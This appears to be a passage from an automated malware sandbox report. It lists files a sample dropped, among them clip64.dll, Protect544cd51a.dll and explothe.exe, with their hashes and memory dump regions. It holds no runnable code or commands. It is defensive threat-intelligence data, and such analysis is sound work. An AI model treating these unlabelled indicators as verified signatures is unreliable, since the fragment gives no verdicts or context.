SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

memory/5360-610-0x00000000011B0000-0x00000000011EE000-memory.dmp

memory/5360-611-0x0000000072930000-0x000000007301E000-memory.dmp

memory/5236-612-0x0000000072930000-0x000000007301E000-memory.dmp

memory/5360-613-0x0000000007D60000-0x0000000007D70000-memory.dmp

memory/5236-614-0x0000000002BC0000-0x0000000002BCA000-memory.dmp

memory/5236-615-0x0000000002BE0000-0x0000000002BE8000-memory.dmp

memory/5236-616-0x00000000054F0000-0x0000000005682000-memory.dmp

\Users\Admin\AppData\Local\Temp\Protect544cd51a.dll

MD5 544cd51a596619b78e9b54b70088307d
SHA1 4769ddd2dbc1dc44b758964ed0bd231b85880b65
SHA256 dfce2d4d06de6452998b3c5b2dc33eaa6db2bd37810d04e3d02dc931887cfddd
SHA512 f56d8b81022bb132d40aa78596da39b5c212d13b84b5c7d2c576bbf403924f1d22e750de3b09d1be30aea359f1b72c5043b19685fc9bf06d8040bfee16b17719

memory/5236-622-0x00000000054E0000-0x00000000054F0000-memory.dmp

memory/5236-623-0x00000000054E0000-0x00000000054F0000-memory.dmp

memory/5236-625-0x00000000054E0000-0x00000000054F0000-memory.dmp

memory/5236-626-0x00000000054E0000-0x00000000054F0000-memory.dmp

memory/5236-624-0x0000000005280000-0x0000000005290000-memory.dmp

memory/5236-628-0x00000000054E0000-0x00000000054F0000-memory.dmp

memory/5236-627-0x00000000054E0000-0x00000000054F0000-memory.dmp

memory/5236-629-0x00000000054E0000-0x00000000054F0000-memory.dmp

memory/5236-630-0x00000000054E0000-0x00000000054F0000-memory.dmp

memory/5360-631-0x0000000072930000-0x000000007301E000-memory.dmp

memory/5236-633-0x0000000005CF0000-0x0000000005DF0000-memory.dmp

memory/5236-636-0x0000000072930000-0x000000007301E000-memory.dmp

memory/5236-638-0x0000000005CF0000-0x0000000005DF0000-memory.dmp

memory/5360-641-0x0000000007D60000-0x0000000007D70000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\YKEG9F5N\suggestions[1].en-US

MD5 5a34cb996293fde2cb7a4ac89587393a
SHA1 3c96c993500690d1a77873cd62bc639b3a10653f
SHA256 c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512 e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

memory/5360-662-0x000000000AA10000-0x000000000AA60000-memory.dmp

memory/5360-664-0x0000000072930000-0x000000007301E000-memory.dmp

memory/5236-665-0x0000000005CF0000-0x0000000005DF0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324